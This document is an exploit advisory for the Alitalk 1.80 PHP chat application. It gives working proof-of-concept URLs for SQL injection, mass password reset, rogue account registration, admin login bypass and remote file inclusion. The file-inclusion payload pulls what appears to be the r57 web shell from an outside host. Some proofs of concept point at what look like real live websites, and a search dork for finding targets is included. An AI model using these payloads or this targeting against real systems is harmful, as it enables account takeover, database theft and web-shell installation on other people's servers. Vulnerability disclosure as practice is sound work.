Alitalk 1.80 SQL Injection / Bypass

2015.06.18
Credit: indoushka
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

| # Title : alitalk v.1.80 Multiple Vulnerabilities | # Author : indoushka | # email : indoushka4ever@gmail.com | # Dork : POWERED BY ALITALK | # Tested on: windows 8.1 Français V.(Pro) | # Download : http://teh24h.ir/ ======================================= SQL INJECTION : you must be logged in to exploit this vulnerability; the `mohit` GET parameter is concatenated unescaped into the query. vulnerable code on inc/receivertwo.php <? ..... if($_GET['turnadd']==1) { $rmusr=0; $rmmzyiz=mysql_query("SELECT * from ".$alitalk_base['dbprefix']."users where room='".$_GET['mohit']."'"); while ($rmuiz=mysql_fetch_array($rmmzyiz)) { echo"<rmusj>"; echo" r%dtr onmouseout=\"detailsclo()\" onmouseover=\"details(event,'".$rmuiz[gender]."','".$rmuiz[age]."','".$rmuiz[username]."','".$rmuiz[location]."')\" ondblclick=\"ums('".$rmuiz[uid]."','".$rmuiz[username]."','".""."')\" b*%d r%dtd width='19'b*%d r%dimg src=\"pix/room_user.gif\"b*%dr%d/tdb*%d r%dtd class='roomuser'b*%dr%dfont unselectable='on' style=\"cursor: default;\"b*%d $rmuiz[username] r%d/tdb*%d r%d/trb*%d"; $rmusr++; echo"</rmusj>"; } .... ?> poc: http://target/path/alitalk/inc/receivertwo.php?uid=1&mohit=y'+union+select+user(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2+from+alitalk_users+where+uid='1&turnadd=1&melody=0&lilil=400 PASSWORD CHANGE BYPASS : the `$id` value (taken from the `id` query parameter in the poc) is concatenated unescaped into both the SELECT that verifies the old password and the two UPDATE statements, so the old-password check does not protect the update. vulnerable code on functionz/usercp.php <? ..... function newpass($db,$id) { $nat=md5($_GET['old'].$_GET['old']); $nao=md5($_GET['new'].$_GET['new']); $threeyiz=mysql_query("SELECT * from ".$db."users where uid='".$id."' and password='".md5(md5($_GET['old']).$nat)."'"); $yiz=mysql_fetch_array($threeyiz); if(!$yiz) { echo "Old Password is Wrong!"; } else { mysql_query("UPDATE ".$db."users SET password='".md5(md5($_GET['new']).$nao)."' WHERE uid='".$id."'"); mysql_query("UPDATE ".$db."users SET salt='".$nao."' WHERE uid='".$id."'"); mpl($db,$id); } } ..... ?> pocs: http://target/path/inc/usercp.php?action=newpass&id=1' or password='&lilil=400&new=algeria this will change the password to "algeria" for the user with uid = 1 (admin). 
http://target/path/inc/usercp.php?action=newpass&id=1' or 1='1&lilil=400&new=algeria this will change ALL passwords to "algeria". http://www.taoa-tanzania.com/chat/alitalk/inc/elementz.php?lilil=400&ubild=indoushka&pa=algeria USER REGISTRATION BYPASS : vulnerable code on inc/elementz.php: <? ...... if($_GET['lilil']!=="".$_SESSION['lilol'].""){return false;} include"setting.php"; $analuze=mysql_query("SELECT username from ".$alitalk_base['dbprefix']."users where username='".$_GET['ubild']."' and type='alitalk'"); $analuzeed=mysql_fetch_array($analuze); if($analuzeed) { echo "Fatal Error"; } else { $nat=md5($_GET['pa'].$_GET['pa']); $pass=md5(md5($_GET['pa']).$nat); mysql_query("INSERT into ".$alitalk_base['dbprefix']."users (firstname,lastname,gender,age,username,password,salt,joindate,addz,type) values('".$_GET['fn']."','".$_GET['ln']."','".$_GET['gender']."','".$_GET['age']."','".$_GET['ubild']."','".$pass."','".$nat."','".date("F j, Y")."','$uid','alitalk')"); .... ?> poc: http://target/path/inc/elementz.php?lilil=400&ubild=algeria&pa=algeria this will add an account with username=algeria and password=algeria. ACCESS BYPASS (admin login) : code on admin/index.php <? ....... else if($_POST['signin']) { include "../functionz/first_process.php"; include "../inc/setting.php"; addin($_POST['username'],$_POST['password'],$alitalk_base['dbprefix']); } ..... ?> vulnerable code on functionz/first_process.php <? ...... 
function addin($lamerz,$killer,$josh) { session_start(); $nat=md5($killer.$killer); $analuze=mysql_query("SELECT * FROM ".$josh."info WHERE admin='".$lamerz."' AND password='".md5(md5($killer).$nat)."'"); $analuzeed=mysql_fetch_array($analuze); if($analuzeed) { $_SESSION['adazsar']=1; ?> the POST `username` value (`$lamerz`) is concatenated unescaped into the admin lookup query, so the password comparison in the WHERE clause can be sidestepped. admin login page = http://target/path/admin poc: ID = an_userID' or 1='1 password = whatever LOCAL/REMOTE FILE INCLUSION : C:\web\www\alitalk\inc\elementd.php require_once('lang/'.$alitalk['lang'].'/menu.php'); Line : 31 Function : require_once Variables : $alitalk['lang'] (reaches require_once without validation; the poc supplies it directly from the query string) poc : http://www.nickerie.net/chat/inc/elementd.php?alitalk[lang]=http://www.dcvi.net/r57.txt Greetz : jericho http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/ Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * exploit4arab.net ---------------------------------------------------------------------------------------------------------------

